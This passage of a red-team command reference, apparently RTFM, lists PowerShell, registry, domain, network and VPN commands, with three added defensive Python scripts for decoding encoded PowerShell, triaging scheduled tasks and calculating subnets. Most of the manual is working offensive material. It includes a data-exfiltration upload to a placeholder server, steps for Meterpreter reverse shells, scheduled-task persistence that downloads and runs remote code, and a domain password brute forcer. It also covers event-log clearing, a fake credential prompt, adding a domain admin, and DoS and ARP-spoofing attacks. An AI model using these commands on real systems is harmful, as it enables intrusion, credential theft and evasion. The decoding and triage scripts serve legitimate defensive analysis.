   (# is the shadow copy number reported by vssadmin; redirect order matters
   in cmd: "2>&1 > file" sends stderr to the console, not to output.txt)
5. From Linux, download and run ntdsxtract and libesedb to export hashes or
   other domain information
   a. Step by step instructions: room362.com
   b. http://www.ntdsxtract.com
   c. libesedb - http://code.google.com/p/libesedb/


POWERSHELL
get-content file                                       Displays file contents
get-help command -examples                             Shows examples of command
get-command *string*                                   Searches for cmd string
get-service                                            Displays services (stop-service, start-service)
get-wmiobject -class win32_service                     Displays services, but takes alternate credentials
$PSVersionTable                                        Display powershell version
powershell.exe -version 2.0                            Run powershell 2.0 from 3.0
get-service | measure-object                           Returns # of services
get-psdrive                                            Returns list of PSDrives
get-process | select -expandproperty name              Returns only names
get-help * -parameter credential                       Cmdlets that take creds
get-wmiobject -list *network*                          Available WMI network cmds
[Net.DNS]::GetHostEntry("ip")                          DNS Lookup

CLEAR SECURITY & APPLICATION EVENT LOG FOR REMOTE
Get-EventLog -list
Clear-EventLog -logname Application, Security -computername SVR01

EXPORT OS INFO INTO CSV FILE
Get-WmiObject -class win32_operatingsystem | select -property * | export-csv c:\os.txt

LIST RUNNING SERVICES
Get-Service | where-object {$_.status -eq "Running"}

PERSISTENT PSDRIVE TO REMOTE FILE SHARE:
New-PSDrive -Persist -PSProvider FileSystem -Root \\1.1.1.1\tools -Name i

RETURN FILES WITH WRITE DATE PAST 8/20
Get-ChildItem -Path c:\ -Force -Recurse -Filter *.log -ErrorAction SilentlyContinue | where {$_.LastWriteTime -gt "2012-08-20"}

FILE DOWNLOAD OVER HTTP
(new-object system.net.webclient).downloadFile("url","dest")

TCP PORT CONNECTION (SCANNER)
$ports=(#,#,#);$ip="x.x.x.x";foreach ($port in $ports) {$socket=$NULL;try{$socket=New-Object System.Net.Sockets.TCPClient($ip,$port);}catch{};if ($socket -eq $NULL) {echo $ip":"$port" - Closed";}else{echo $ip":"$port" - Open";$socket.Close();}}

PING WITH 500 MILLISECOND TIMEOUT
$ping = New-Object System.Net.NetworkInformation.ping
$ping.Send("ip",500)

BASIC AUTHENTICATION POPUP
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $Host.UI.PromptForCredential("title","message","user","domain")

RUN EXE EVERY 4 HOURS BETWEEN AUG 8-11, 2013 AND THE HOURS OF 0800-1700 (FROM CMD.EXE)
powershell.exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match '201308(0[8-9]|1[0-1])-(0[8-9]|1[0-6])[0-5][0-9]') {Start-Process -WindowStyle Hidden 'C:\Temp\my.exe';Start-Sleep -s 14400}}while(1)"

POWERSHELL RUNAS
$pw = convertto-securestring -string "PASSWORD" -asplaintext -force;
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "DOMAIN\user",$pw;
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process file.exe -verb runas}'

EMAIL SENDER
powershell.exe Send-MailMessage -to "email" -from "email" -subject "Subject" -a "attachment file path" -body "Body" -SmtpServer Target_Email_Server_IP

TURN ON POWERSHELL REMOTING (WITH VALID CREDENTIALS)
net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item wsman:\localhost\client\trustedhosts *'"
at \\ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username

LIST HOSTNAME AND IP FOR ALL DOMAIN COMPUTERS
Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "domainname='DOMAIN'" | select textrepresentation

POWERSHELL DOWNLOAD OF A FILE FROM A SPECIFIED LOCATION
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $source=""https://YOUR_SPECIFIED_IP/file.zip""; $destination=""C:\master.zip""; $http = new-object System.Net.WebClient; $http.DownloadFile($source, $destination);"

POWERSHELL DATA EXFIL
Script will send a file ($filepath) via http to server ($server) via POST
request. Must have web server listening on port designated in the $server
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $server=""https://YOUR_SPECIFIED_IP/folder""; $filepath=""C:\master.zip""; $http = new-object System.Net.WebClient; $http.UploadFile($server,$filepath);"

USING POWERSHELL TO LAUNCH METERPRETER FROM MEMORY
Need Metasploit v4.5+ (msfvenom supports Powershell)
Use Powershell (x86) with 32 bit Meterpreter payloads
encodeMeterpreter.psl script can be found on next page

ON ATTACK BOXES
1.
2.
3.
4.
5.

./msfvenom -p Wlndows/meterpreter/reverse https -f psh -a x86
LHOST=l.l.l.l LPORT=443
audit.psl
Move audit.psl into same folder as encodeMeterpreter.psl
Launch Powershell (x86)
powershell.exe -executionpolicy bypass encodeMeterpreter.psl
Copy the encoded Meterpreter string

START LISTENER ON ATTACK BOX
1.
2.
3.
4.
5.
6.

./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse https
set LHOST 1. 1. 1. 1
set LPORT 443
exploit -j

ON TARGET (MUST USE POWERSHELL (x86))
1.

powershell. exe -noexi t -encodedCommand
string here

paste encoded

PROFIT

ENCODEMETERPRETER.PS1 [7]
# Get Contents of Script
$contents = Get-Content audit.ps1
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms,$action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$contents | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()

# Base64 Encode Stream
$code = [Convert]::ToBase64String($ms.ToArray())
$command = "Invoke-Expression `$(New-Object IO.StreamReader(`$(New-Object IO.Compression.DeflateStream(`$(New-Object IO.MemoryStream(,`$([Convert]::FromBase64String('$code')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
# Invoke-Expression $command
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
# Write to Standard Out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved.
Please see reference [7] for disclaimer
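The decoding counterpart an analyst needs when such a blob turns up in a process command line, added here as an example; it is not part of RTFM or of the TrustedSec script above. Given the Base64 string that -encodedCommand receives, it reverses the UTF-16LE/Base64 outer layer, pulls the inner FromBase64String('...') argument out of the Invoke-Expression wrapper, and inflates the raw Deflate stream so the original script can be read without executing anything. The sample blob is constructed inside the block by applying the same compress-then-encode steps to a harmless Write-Host line; the function names are my own.

```python
import base64
import re
import zlib
from typing import Optional

# Inner payload shape produced by encodeMeterpreter.ps1: ...FromBase64String('<b64>')...
INNER_B64 = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def decode_encoded_command(blob: str) -> str:
    """Undo [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command)).
    PowerShell's 'Unicode' encoding is UTF-16LE, so that is what is decoded here."""
    return base64.b64decode(blob).decode("utf-16-le")


def inflate_inner_script(command: str) -> Optional[str]:
    """Recover the compressed script carried inside the Invoke-Expression wrapper.
    DeflateStream emits raw Deflate (no zlib header), hence wbits=-15.
    Returns None when the command carries no such payload."""
    match = INNER_B64.search(command)
    if match is None:
        return None
    raw = base64.b64decode(match.group(1))
    return zlib.decompress(raw, -15).decode("ascii")


def triage(blob: str) -> dict:
    """Everything worth recording from one -encodedCommand argument."""
    command = decode_encoded_command(blob)
    return {
        "outer_command": command,
        "inner_script": inflate_inner_script(command),
        "uses_iex": bool(re.search(r"\bIEX\b|Invoke-Expression", command, re.I)),
    }


def build_sample_blob(script_lines) -> str:
    """Constructed test input: the same compress -> Base64 -> Invoke-Expression
    wrapper -> UTF-16LE -> Base64 pipeline as the PowerShell script, applied to
    a harmless script so the example runs offline."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    data = b"".join(comp.compress((line + "\n").encode("ascii")) for line in script_lines)
    data += comp.flush()
    code = base64.b64encode(data).decode("ascii")
    command = (
        "Invoke-Expression $(New-Object IO.StreamReader($(New-Object "
        "IO.Compression.DeflateStream($(New-Object IO.MemoryStream(,"
        f"$([Convert]::FromBase64String('{code}')))), "
        "[IO.Compression.CompressionMode]::Decompress)), "
        "[Text.Encoding]::ASCII)).ReadToEnd();"
    )
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


SAMPLE_BLOB = build_sample_blob(['Write-Host "hello from the inner script"'])

if __name__ == "__main__":
    result = triage(SAMPLE_BLOB)
    print("IEX used:", result["uses_iex"])
    print(result["inner_script"])
```

The same two-stage decode applies to any blob that follows this compress/encode pattern; a blob whose decoded command has no FromBase64String argument simply comes back with inner_script set to None, which is itself a useful signal that a different loader is in play.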

USING POWERSHELL TO LAUNCH METERPRETER (2ND METHOD)

ON BT ATTACK BOX
1. msfpayload windows/meterpreter/reverse_tcp R | msfencode -t psh -a x86

ON WINDOWS ATTACK BOX
1. c:\> powershell
2. PS c:\> $cmd = '<PASTE THE CONTENTS OF THE PSH SCRIPT HERE>'
3. PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
4. PS c:\> $e = [Convert]::ToBase64String($u)
5. PS c:\> $e
6. Copy contents of $e

START LISTENER ON ATTACK BOX
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse_tcp
4. set LHOST 1.1.1.1
5. set LPORT 8080
6. exploit -j

ON TARGET SHELL (1: DOWNLOAD SHELLCODE, 2: EXECUTE)
1. c:\> powershell -noprofile -noninteractive -command "& {$client = new-object System.Net.WebClient;$client.DownloadFile('http://1.1.1.1/shell.txt','c:\windows\temp\shell.txt')}"
2. c:\> powershell -noprofile -noninteractive -noexit -command "& {$cmd = type 'c:\windows\temp\shell.txt';powershell -noprofile -noninteractive -noexit -encodedCommand $cmd}"

PROFIT

WINDOWS REGISTRY
OS INFORMATION
HKLM\Software\Microsoft\Windows NT\CurrentVersion

PRODUCT NAME
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v ProductName

DATE OF INSTALL
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate

REGISTERED OWNER
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner

SYSTEM ROOT
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v SystemRoot

TIME ZONE (OFFSET IN MINUTES FROM UTC)
HKLM\System\CurrentControlSet\Control\TimeZoneInformation /v ActiveTimeBias

MAPPED NETWORK DRIVES
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU

MOUNTED DEVICES
HKLM\System\MountedDevices

USB DEVICES
HKLM\System\CurrentControlSet\Enum\USBStor

TURN ON IP FORWARDING
IPEnableRouter = 1

PASSWORD KEYS:
LSA SECRETS CAN CONTAIN VPN, AUTOLOGON, OTHER PASSWORDS
HKEY_LOCAL_MACHINE\Security\Policy\Secrets
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\autoadminlogon

AUDIT POLICY
HKLM\Security\Policy\PolAdtEv

KERNEL/USER SERVICES
HKLM\Software\Microsoft\Windows NT\CurrentControlSet\Services

INSTALLED SOFTWARE ON MACHINE
HKLM\Software

INSTALLED SOFTWARE FOR USER
HKCU\Software

RECENT DOCUMENTS
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

RECENT USER LOCATIONS
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU & \OpenSaveMRU

TYPED URLs
HKCU\Software\Microsoft\Internet Explorer\TypedURLs

MRU LISTS
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

LAST REGISTRY KEY ACCESSED
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\RegEdit /v LastKey

STARTUP LOCATIONS
HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \Runonce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run

ENUMERATING WINDOWS DOMAIN WITH DSQUERY
LIST USERS ON DOMAIN WITH NO LIMIT ON RESULTS
dsquery user -limit 0

LIST GROUPS FOR DOMAIN=VICTIM.COM
dsquery group "cn=users,dc=victim,dc=com"

LIST DOMAIN ADMIN ACCOUNTS
dsquery group -name "domain admins" | dsget group -members -expand

LIST ALL GROUPS FOR A USER
dsquery user -name bob | dsget user -memberof -expand

GET A USER'S LOGIN ID
dsquery user -name <user> | dsget user -samid

LIST ACCOUNTS INACTIVE FOR 2 WEEKS
dsquery user -inactive 2

ADD DOMAIN USER
dsadd user "CN=Bob,CN=Users,DC=victim,DC=com" -samid bob -pwd bobpass -display "Bob" -pwdneverexpires yes -memberof "CN=Domain Admins,CN=Users,DC=victim,DC=com"

DELETE USER
dsrm -subtree -noprompt "CN=Bob,CN=Users,DC=victim,DC=com"

LIST ALL OPERATING SYSTEMS ON DOMAIN
dsquery * "DC=victim,DC=com" -scope subtree -attr "cn" "operatingSystemServicePack" -filter "(&(objectclass=computer)(objectcategory=computer)(operatingSystem=Windows*))"

LIST ALL SITE NAMES
dsquery site -o rdn

LIST ALL SUBNETS WITHIN A SITE
dsquery subnet -site <sitename> -o rdn

LIST ALL SERVERS WITHIN A SITE
dsquery server -site <sitename> -o rdn

FIND SERVERS IN THE DOMAIN
dsquery * domainroot -filter "(&<filter>)" -limit 0

DOMAIN CONTROLLERS PER SITE
dsquery * "CN=Sites,CN=Configuration,DC=forestRootDomain" -filter <filter>

WINDOWS SCRIPTING
# If scripting in a batch file, variables must be preceded with %%, i.e. %%i

NESTED FOR LOOP PING SWEEP
for /L %i in (10,1,254) do @(for /L %x in (10,1,254) do @ping -n 1 -w 100 10.10.%i.%x 2>nul | find "Reply" && echo 10.10.%i.%x >> live.txt)

LOOP THROUGH FILE
for /F %i in (<file>) do <command>

DOMAIN BRUTE FORCER
for /F %n in (names.txt) do for /F %p in (pawds.txt) do net use \\DC01\IPC$ /user:<domain>\%n %p 1>NUL 2>&1 && echo %n:%p && net use /delete \\DC01\IPC$ > NUL

ACCOUNT LOCKOUT (LOCKOUT.BAT)
@echo Test run:
for /f %%U in (list.txt) do @for /l %%C in (1,1,5) do @echo net use \\WIN-1234\c$ /USER:%%U wrongpass

DHCP EXHAUSTION
for /L %i in (2,1,254) do (netsh interface ip set address local static 1.1.1.%i <netmask> <gw> %1 ping 127.0.0.1 -n 1 -w 10000 > nul %1)

DNS REVERSE LOOKUP
for /L %i in (100,1,105) do @nslookup 1.1.1.%i | findstr /i /c:"Name" >> dns.txt && echo Server: 1.1.1.%i >> dns.txt

SEARCH FOR FILES BEGINNING WITH THE WORD "PASS" AND THEN PRINT IF IT'S A DIRECTORY, FILE DATE/TIME, RELATIVE PATH, ACTUAL PATH AND SIZE (@VARIABLES ARE OPTIONAL)
forfiles /P c:\temp /s /m pass* -c "cmd /c echo @isdir @fdate @ftime @relpath @path @fsize"

SIMULATE MALICIOUS DOMAIN CALLOUTS (USEFUL FOR AV/IDS TESTING)
Run a packet capture on the attack domain to receive the callouts.
domains.txt should contain known malicious domains.
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n <attack domain> > NUL 2>&1 & ping -n 5 127.0.0.1 > NUL 2>&1)

IE WEB LOOPER (TRAFFIC GENERATOR)
for /L %C in (1,1,5000) do @for %U in (www.yahoo.com www.pastebin.com www.paypal.com www.craigslist.org www.google.com) do start /b iexplore %U & ping -n 6 localhost & taskkill /F /IM iexplore.exe

GET PERMISSIONS ON SERVICE EXECUTABLES
for /f "tokens=2 delims='='" %a in ('wmic service list full | find /i "pathname" | find /i /v "system32"') do @echo %a >> c:\windows\temp\3afd4ga.tmp
for /f eol=" delims=" %a in (c:\windows\temp\3afd4ga.tmp) do cmd.exe /c icacls "%a"

ROLLING REBOOT (REPLACE /R WITH /S FOR A SHUTDOWN):
for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t 0 /c "Reboot message"

SHELL ESCALATION USING VBS (NEED ELEVATED CREDENTIALS)
# Create a .vbs script with the following
Set shell = wscript.createobject("wscript.shell")
Shell.run "runas /user:<user> " & """" & "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -ep bypass -nop -c \" & """" & "IEX ((New-Object Net.WebClient).downloadstring('<url>'))\" & """" & """"
wscript.sleep (100)
shell.Sendkeys "<password>" & "{ENTER}"

TASK SCHEDULER
# Scheduled task binary paths CANNOT contain spaces, because everything after the first space in the path is considered to be a command-line argument. Enclose the /TR path parameter between backslash (\) AND quotation marks ("):
... /TR "\"C:\Program Files\file.exe\" -x arg1"

TASK SCHEDULER (ST=START TIME, SD=START DATE, ED=END DATE)
*MUST BE ADMIN
SCHTASKS /CREATE /TN <Task Name> /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD MM/DD/YYYY /ED MM/DD/YYYY /tr "C:\my.exe" /RU DOMAIN\<user> /RP <password>

TASK SCHEDULER PERSISTENCE [10]
# For 64 bit use: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
# (x86) on User Login
SCHTASKS /CREATE /TN <Task Name> /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://<ip>:<port>/<payload>''))'" /SC onlogon /RU System
# (x86) on System Start
SCHTASKS /CREATE /TN <Task Name> /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://<ip>:<port>/<payload>''))'" /SC onstart /RU System
# (x86) on User Idle (30 Minutes)
SCHTASKS /CREATE /TN <Task Name> /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://<ip>:<port>/<payload>''))'" /SC onidle /i 30
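The hunt-side view of the scheduled-task entries above, as an added example that is not from RTFM: it reads the CSV that `schtasks /query /fo CSV /v` emits and flags tasks whose "Task To Run" column shows the traits of that one-liner (execution-policy bypass, -nop, hidden window, download cradle, IEX, or an encoded command), with a weaker, low-severity flag for binaries outside the Windows and Program Files trees. The CSV rows are constructed and carry only a subset of the real columns; the column names used ("TaskName", "Task To Run", "Schedule Type", "Run As User") are the ones schtasks prints.

```python
import csv
import io
import re

# Constructed rows in the layout of `schtasks /query /fo CSV /v` (a subset of
# its columns). The task command lines mirror the SCHTASKS entries above;
# 203.0.113.5 is a documentation address, not a real host.
SAMPLE_CSV = r'''"HostName","TaskName","Status","Author","Task To Run","Schedule Type","Run As User"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$","Weekly","SYSTEM"
"WS01","\Updater","Ready","WS01\bob","C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://203.0.113.5:8080/payload''))'","At logon","SYSTEM"
"WS01","\Backup","Ready","WS01\bob","C:\Tools\backup.exe /quiet","Daily","WS01\bob"
'''

# (reason, pattern) pairs matched against the "Task To Run" column.
STRONG_INDICATORS = [
    ("execution policy bypass", re.compile(r"-(?:ep|ex\w*)\s+bypass", re.I)),
    ("no profile (-nop)", re.compile(r"\s-nop\b", re.I)),
    ("hidden window", re.compile(r"-windowstyle\s+hidden", re.I)),
    ("download cradle", re.compile(r"download(?:string|file)", re.I)),
    ("Invoke-Expression / IEX", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("encoded command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
]
# Binaries launched from these roots get no path warning; anything else does.
SYSTEM_PATH = re.compile(r'^"?(?:%windir%|%systemroot%|c:\\windows\\|c:\\program files)', re.I)


def triage_schtasks(csv_text: str):
    """Return one finding per suspicious task: task name, run-as user, schedule,
    severity ('high' if any strong indicator matched, else 'low') and reasons."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row.get("Task To Run", "")
        reasons = [reason for reason, pat in STRONG_INDICATORS if pat.search(cmd)]
        severity = "high" if reasons else None
        if not SYSTEM_PATH.match(cmd):
            reasons.append("binary outside Windows/Program Files")
            severity = severity or "low"
        if severity:
            findings.append({
                "task": row["TaskName"],
                "run_as": row["Run As User"],
                "schedule": row["Schedule Type"],
                "severity": severity,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in triage_schtasks(SAMPLE_CSV):
        print(f"[{finding['severity']}] {finding['task']} as {finding['run_as']} "
              f"({finding['schedule']}): {', '.join(finding['reasons'])}")
```

Run against a real export by reading the CSV file into `triage_schtasks`; the low-severity path check will fire on plenty of legitimate third-party software, so it is a sorting aid rather than a verdict, while any high-severity hit on a task running as SYSTEM deserves immediate attention.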

COMMON PORTS
21      FTP
22      SSH
23      Telnet
25      SMTP
49      TACACS
53      DNS
67/8    DHCP (UDP)
69      TFTP (UDP)
80      HTTP
88      Kerberos
110     POP3
111     RPC
123     NTP (UDP)
135     Windows RPC
137     NetBIOS
138     NetBIOS
139     SMB
143     IMAP
161     SNMP (UDP)
179     BGP
201     AppleTalk
389     LDAP
443     HTTPS
445     SMB
500     ISAKMP (UDP)
514     Syslog
520     RIP
546/7   DHCPv6
587     SMTP
902     VMWare
1080    Socks Proxy
1194    VPN
1433/4  MS-SQL
1521    Oracle
1629    DameWare
2049    NFS
3128    Squid Proxy
3306    MySQL
3389    RDP
5060    SIP
5222    Jabber
5432    Postgres
5666    Nagios
5900    VNC
6000    X11
6129    DameWare
6667    IRC
9001    Tor
9001    HSQL
9090/1  Openfire
9100    Jet Direct

TTL FINGERPRINTING
Windows : 128
Linux   : 64
Network : 255
Solaris : 255

IPv4
CLASSFUL IP RANGES
A   0.0.0.0   - 127.255.255.255
B   128.0.0.0 - 191.255.255.255
C   192.0.0.0 - 223.255.255.255
D   224.0.0.0 - 239.255.255.255
E   240.0.0.0 - 255.255.255.255

RESERVED RANGES
10.0.0.0    - 10.255.255.255
127.0.0.0   - 127.255.255.255
172.16.0.0  - 172.31.255.255
192.168.0.0 - 192.168.255.255

SUBNETTING
/31   255.255.255.254   1 Host
/30   255.255.255.252   2 Hosts
/29   255.255.255.248   6 Hosts
/28   255.255.255.240   14 Hosts
/27   255.255.255.224   30 Hosts
/26   255.255.255.192   62 Hosts
/25   255.255.255.128   126 Hosts
/24   255.255.255.0     254 Hosts
/23   255.255.254.0     510 Hosts
/22   255.255.252.0     1022 Hosts
/21   255.255.248.0     2046 Hosts
/20   255.255.240.0     4094 Hosts
/19   255.255.224.0     8190 Hosts
/18   255.255.192.0     16382 Hosts
/17   255.255.128.0     32766 Hosts
/16   255.255.0.0       65534 Hosts
/15   255.254.0.0       131070 Hosts
/14   255.252.0.0       262142 Hosts
/13   255.248.0.0       524286 Hosts
/12   255.240.0.0       1048574 Hosts
/11   255.224.0.0       2097150 Hosts
/10   255.192.0.0       4194302 Hosts
/9    255.128.0.0       8388606 Hosts
/8    255.0.0.0         16777214 Hosts

CALCULATING SUBNET RANGE
Given: 1.1.1.101/28
/28 = 255.255.255.240 netmask
256 - 240 = 16 = subnet ranges of 16, i.e.
1.1.1.0
1.1.1.16
1.1.1.32 ...
Range where given IP falls: 1.1.1.96 - 1.1.1.111
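The worked subnet calculation above, carried out for any a.b.c.d/p as an added example (not RTFM's own): mask from prefix, block size as 256 minus the first mask octet that is not 255, the network as the address rounded down to a multiple of that block, and a cross-check against the standard library's ipaddress module. The same helpers regenerate the SUBNETTING table so its host counts can be verified rather than trusted.

```python
import ipaddress


def prefix_to_mask(prefix: int) -> str:
    """/28 -> 255.255.255.240: the top `prefix` bits of a 32-bit word set to 1."""
    bits = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF
    return ".".join(str((bits >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def usable_hosts(prefix: int) -> int:
    """2^(32-prefix) - 2 addresses, with /31 counted as 1 host as the table does."""
    return max(2 ** (32 - prefix) - 2, 1)


def subnet_range(cidr: str) -> dict:
    """Carry out the steps of the worked example for any address/prefix."""
    addr_text, prefix_text = cidr.split("/")
    prefix = int(prefix_text)
    mask = prefix_to_mask(prefix)
    mask_octets = [int(o) for o in mask.split(".")]
    # Step 2: the first mask octet that is not 255 is where the network number
    # changes; 256 - that octet is the size of each block in that octet.
    octet_index = next((i for i, o in enumerate(mask_octets) if o != 255), 3)
    block_size = 256 - mask_octets[octet_index]
    # Step 3: round the address down to the block boundary (AND with the mask),
    # then fill the host bits with ones for the broadcast address.
    addr = int(ipaddress.IPv4Address(addr_text))
    mask_int = int(ipaddress.IPv4Address(mask))
    network = addr & mask_int
    broadcast = network | (~mask_int & 0xFFFFFFFF)
    expected = f"{ipaddress.IPv4Address(network)}/{prefix}"
    return {
        "mask": mask,
        "block_size": block_size,
        "range": f"{ipaddress.IPv4Address(network)} - {ipaddress.IPv4Address(broadcast)}",
        "usable_hosts": usable_hosts(prefix),
        # Cross-check: the standard library must agree on the network address.
        "matches_ipaddress": str(ipaddress.ip_network(cidr, strict=False)) == expected,
    }


def subnet_table(lo: int = 8, hi: int = 31):
    """Regenerate the SUBNETTING table above as (prefix, mask, usable hosts)."""
    return [(f"/{p}", prefix_to_mask(p), usable_hosts(p)) for p in range(hi, lo - 1, -1)]


if __name__ == "__main__":
    print(subnet_range("1.1.1.101/28"))
    for row in subnet_table():
        print("{:<5} {:<17} {} Hosts".format(*row))
```

Passing a prefix shorter than /24 moves the varying octet left, which is the part of the manual method people most often get wrong; the block_size field reports which octet's step the answer is based on by construction, since it is derived from the first non-255 mask octet.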

IPv6
BROADCAST ADDRESSES
ff02::1   link-local nodes
ff05::1   site-local nodes
ff01::2   node-local routers
ff02::2   link-local routers
ff05::2   site-local routers

INTERFACE ADDRESSES
fe80::          link-local
2001::          routable
::a.b.c.d       IPv4 compatible IPv6
::ffff:a.b.c.d  IPv4 mapped IPv6

THC IPv6 TOOLKIT
Remote Network DoS:
rsmurf6 eth# <remote ipv6>

SOCAT TUNNEL IPv6 THROUGH IPv4 TOOLS
socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[2001::]:80
./nikto.pl -host 127.0.0.1 -port 8080

CISCO COMMANDS
Configure interface             #configure terminal
Configure FastEthernet 0/0      (config)#interface fa0/0
Add IP to fa0/0                 (config-if)#ip addr 1.1.1.1 255.255.255.0
Configure vty line              (config)#line vty 0 4
1. Set telnet password          (config-line)#login
2. Set telnet password          (config-line)#password password
Open sessions                   #show session
IOS version                     #show version
Available files                 #dir file systems
File information                #dir all-filesystems
Deleted files                   #dir /all
Config loaded in mem            #show running-config
Config loaded at boot           #show startup-config
Interfaces                      #show ip interface brief
Detailed interface info         #show interface e0
Routes                          #show ip route
Access lists                    #show access-lists
No limit on output              #terminal length 0
Replace run w/ start config     #copy running-config startup-config
Copy run config to TFTP Svr     #copy running-config tftp

CISCO IOS 11.2-12.2 VULNERABILITY
http://<ip>/level/16-99/exec/show/config

SNMP
MUST START TFTP SERVER 1ST
./snmpblow.pl -s <srcip> -d <rtr ip> -t <attackerip> -f out.txt
snmpstrings.txt (community string wordlist)

WINDOWS RUNNING SERVICES:
snmpwalk -c public -v1 <ip> 1 | grep hrSWRunName | cut -d" " -f4

WINDOWS OPEN TCP PORTS:
snmpwalk -c public -v1 <ip> 1 | grep tcpConnState | cut -d" " -f6 | sort -u

WINDOWS INSTALLED SOFTWARE:
snmpwalk -c public -v1 <ip> 1 | grep hrSWInstalledName

WINDOWS USERS:
snmpwalk -c public -v1 <ip> 1.3 | grep 77.1.2.25 | cut -d" " -f4

PACKET CAPTURING
CAPTURE TCP TRAFFIC ON PORT 22-23
tcpdump -nvvX -s0 -i eth0 tcp portrange 22-23

CAPTURE TRAFFIC TO SPECIFIC IP EXCLUDING SPECIFIC SUBNET
tcpdump -i eth0 -tttt dst <ip> and not net 1.1.1.0/24

CAPTURE TRAFFIC B/W LOCAL-192.1
tcpdump net 192.1.1

CAPTURE TRAFFIC FOR <SECONDS>
dumpcap -i eth0 -a duration:<sec> -w <file>

REPLAY PCAP
file2cable -i eth0 -f file.pcap

REPLAY PACKETS (FUZZ / DoS)
tcpreplay --topspeed --loop=0 --intf=eth0 <pcap_file_to_replay> mbps=10|100|1000

DNS

DNSRECON
Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 192.1.1.1,192.1.1.20
Retrieve standard DNS records:
./dnsrecon.rb -t std -d domain.com
Enumerate subdomains:
./dnsrecon.rb -t brt -d domain.com -w hosts.txt
DNS zone transfer:
./dnsrecon -d domain.com -t axfr

NMAP REVERSE DNS LOOKUP AND OUTPUT PARSER
nmap -R -sL -Pn --dns-servers <dns svr ip> <range> | awk '{if( ($1" "$2" "$3)=="Nmap scan report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' > dns.txt

VPN
WRITE PSK TO FILE
ike-scan -M -A <vpn ip> -P <file>

DoS VPN SERVER
ike-scan -A -t 1 --sourceip=<spoof ip> <dst ip>

FIKED - FAKE VPN SERVER
Must know the VPN group name and pre-shared key
1. Ettercap filter to drop IPSEC traffic (UDP port 500)
   if (ip.proto == UDP && udp.src == 500) {
     kill();
     drop();
     msg("UDP packet dropped\n");
   }
2. Compile filter
   etterfilter udpdrop.filter -o udpdrop.ef
3. Start Ettercap and drop all IPSEC
   #ettercap -T -g -M arp -F udpdrop.ef // //
4. Enable IP Forward
   echo "1" > /proc/sys/net/ipv4/ip_forward
